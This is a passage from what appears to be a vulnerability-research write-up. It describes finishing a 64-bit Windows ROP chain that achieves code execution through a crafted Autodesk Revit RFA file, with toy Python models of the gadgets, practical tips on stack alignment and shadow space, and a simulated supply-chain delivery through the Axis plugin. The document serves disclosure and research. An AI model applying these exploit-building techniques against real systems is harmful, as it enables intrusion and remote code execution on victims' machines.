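To make the data flow of this four-gadget sequence easier to follow, here is a toy Python model of it. This is a sketch under simplifying assumptions, not an emulation of the real gadgets: the gadget names are symbolic labels rather than real addresses, the register values are made up, the slot layout is hypothetical, the bare ret is modeled simply as a spacer slot, and side effects of the real gadgets (such as the stray xchg) are omitted.

```python
# Toy model only: labels stand in for gadget addresses, and the
# register values below are invented for illustration.
END = "end-of-chain"

def mov_rax_rbx(regs, mem, pop):
    regs["rax"] = regs["rbx"]

def store_rax_at_rcx(regs, mem, pop):
    mem[regs["rcx"]] = regs["rax"]      # writes into the chain itself

def bare_ret(regs, mem, pop):
    pass                                # does nothing except consume one slot

def pop_rcx(regs, mem, pop):
    regs["rcx"] = pop()                 # reads the slot that was just overwritten

GADGETS = {
    "mov rax, rbx": mov_rax_rbx,
    "mov [rcx], rax": store_rax_at_rcx,
    "ret": bare_ret,
    "pop rcx": pop_rcx,
}

def run_chain(base, chain, regs):
    """Lay the chain out in memory at `base` and execute it ret by ret."""
    mem = {base + 8 * i: entry for i, entry in enumerate(chain)}
    regs = dict(regs, rsp=base)

    def pop():
        value = mem[regs["rsp"]]
        regs["rsp"] += 8
        return value

    while True:
        target = pop()                  # models the ret that ends each gadget
        if target == END:
            return regs
        GADGETS[target](regs, mem, pop)

BASE = 0x1000
chain = ["mov rax, rbx", "mov [rcx], rax", "ret", "pop rcx", "PLACEHOLDER", END]
# rcx initially holds the address of the placeholder slot (index 4).
start = {"rax": 0, "rbx": 0x7FFB12340000, "rcx": BASE + 8 * 4, "rdx": 0x180020000}
final = run_chain(BASE, chain, start)

print(hex(final["rcx"]))   # 0x7ffb12340000
print(hex(final["rdx"]))   # 0x180020000
```

In this model, the value that started in rbx ends up in rcx, while rdx is never touched. That is the property the real sequence needs in order to preserve the second argument to GetProcAddress.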

I finished the ROP chain as follows:
• I called GetProcAddress
• I moved the result of GetProcAddress from rax into rbx, because rax won’t be preserved by the following gadget
• I used my stack address primitive one final time to load the address of a command string into rcx
• I called ucrtbase!system using the gadget jmp rbx

For the command string I used powershell.exe with the -Command switch, which provides plenty of flexibility for arbitrary code execution. As a final note, ucrtbase!system does not return until the spawned shell process exits. So, if desired, the spawned process could take this opportunity to alter the memory of the Revit process and fix up all the damage, allowing the Revit process to continue without a crash.

I’m releasing my full notes on the ROP chain here.

Miscellaneous Notes and Lessons Learned

Here I would just like to include a few items regarding ROP on 64-bit Windows that did not fit logically into my exposition above but nonetheless may be useful to the reader.

  1. When calling any function, keep in mind that the function may need a significant amount of stack space to execute correctly. If you pass a literal on the stack, the function’s execution could easily overwrite the literal, resulting in improper execution. Accordingly, immediately before making the call, execute a sequence of gadgets that advance the stack pointer sufficiently to avoid a conflict. You will have to determine the required amount experimentally.
  2. Similarly, if you have performed a stack pivot such as the one described in this article, rsp will likely be pointing within a heap block. If you do not advance the stack pointer sufficiently before you make a call, stack growth during the call may corrupt heap memory below the current block. Then, heap routines such as HeapAlloc and HeapFree, executing on the current thread or any other thread, may detect the corruption and abruptly terminate the process before your exploit is complete. As above, the solution is to advance the stack pointer sufficiently prior to making a call.
  3. In the Windows x64 calling convention, callees are entitled to use the 0x20-byte region just above the return address on the stack as a scratch area (“shadow space”). After the return from a function, therefore, you have no guarantee of the integrity of those next 0x20 bytes of the stack. To compensate for this, whenever you call a function from ROP, the very next gadget must immediately advance the stack pointer past this possibly corrupted region.
  4. Stack alignment: In the Windows x64 calling convention, rsp is 8-byte aligned at all times; however, the rules for 16-byte alignment are more subtle. Before the first instruction of every function, rsp MUST NOT be 16-byte aligned. Another way to say this is that, before every call instruction, rsp MUST be 16-byte aligned; the call will decrement rsp by 8 and store the return address at the new rsp, so that the first instruction of the callee will execute with a 16-byte non-aligned rsp as expected. When calling functions (or significant portions thereof) from ROP, stack alignment must be considered. Before executing a call to the start of a function, ensure that rsp is 16-byte aligned. In contrast, before executing a jmp to the first instruction of a function, ensure that rsp is not 16-byte aligned. If you use ROP to perform a call or jmp to an instruction somewhere in the middle of a function, you may need to consider stack alignment and bring rsp into 16-byte alignment or 16-byte non-alignment as expected by the code you are calling; apart from prolog and epilog code, most compiled code expects 16-byte aligned rsp. (For the vast majority of typical short gadgets, though, stack alignment is of no consequence.) Changing from 16-byte aligned to 16-byte unaligned rsp or vice-versa within ROP is as simple as executing a single ret gadget. However, a more advanced solution would be needed if, at the start, you do not know the state of rsp alignment with certainty.
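Items 3 and 4 above can be combined into a small chain-building helper. The Python sketch below assumes that the address of the ROP chain is known modulo 16 and that the function is entered by a ret (which behaves like the jmp case, so rsp must not be 16-byte aligned at the callee's first instruction). The gadget labels, filler value, and example addresses are hypothetical placeholders, not gadgets from the actual exploit.

```python
RET = "ret"                        # hypothetical: address of a bare `ret` gadget
SKIP_0X20 = "add rsp, 0x20 ; ret"  # hypothetical: gadget that skips four qwords
FILLER = 0x4141414141414141        # slots the callee is free to overwrite

def emit_call(chain, chain_base, func):
    """Append `func` to the chain so that it is entered with rsp % 16 == 8,
    followed by a gadget that steps over the 0x20-byte shadow space.
    Returns the value rsp will have at the callee's first instruction."""
    slot = chain_base + 8 * len(chain)     # address of the slot that will hold func
    # The ret that enters func leaves rsp at slot + 8, so slot must be 16-byte aligned.
    if slot % 16 != 0:
        chain.append(RET)                  # one bare ret flips the alignment
        slot += 8
    chain.append(func)
    chain.append(SKIP_0X20)                # acts as the callee's return address
    chain.extend([FILLER] * 4)             # shadow space: may be clobbered by the callee
    return slot + 8

BASE = 0x2000
chain = ["pop rcx ; ret", 0x2100, "some other gadget"]   # three slots already emitted
entry_rsp = emit_call(chain, BASE, "GetProcAddress")

print(hex(entry_rsp % 16))   # 0x8
print(chain.count(RET))      # 1
```

When the chain address is not known modulo 16, this simple parity check does not apply, which is the case the last sentence of item 4 warns about.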

Combined Demo: Axis Supply Chain Vulnerabilities + Autodesk Revit RCE

Please refer to this article by my colleague Nitesh Surana regarding the cloud vulnerabilities he discovered in the Axis Communications Plugin for Autodesk Revit (ZDI-24-1181, ZDI-24-1328, ZDI-24-1329, and ZDI-25-858). Had an attacker taken advantage of those cloud misconfigurations, they could have replaced RFA files in cloud storage accounts belonging to Axis. Those RFA files would then have been served to Revit users of the Axis plugin worldwide, whenever they added Axis products to their models in Autodesk Revit. In this way the attacker would achieve “one-click” remote code execution at scale. The following video simulates the consequences of a supply chain attack. The only simulated part is that a crafted RFA file is introduced artificially, by means of a Fiddler proxy, into the network traffic between Axis cloud storage and the plugin. Once the RFA file is delivered, the Revit application parses it automatically, and the video shows actual execution of the ROP exploit.

Conclusion

In this article I have provided you with an overview of how I started with an Autodesk Revit file parsing crash of highly uncertain potential, and turned it into a code execution exploit that is fully reliable even on the latest Windows x64 platform. This RCE is unusually impactful due to the Axis cloud misconfiguration that could have resulted in automatic exploitation during normal usage of the affected products. I hope you have found the techniques discussed here informative and beneficial to your own research.

I would like to thank my colleagues Mat Powell and Nitesh Surana for their contributions to this research. Hopefully, we’ll have more tools and techniques to release in the future. Until then, follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.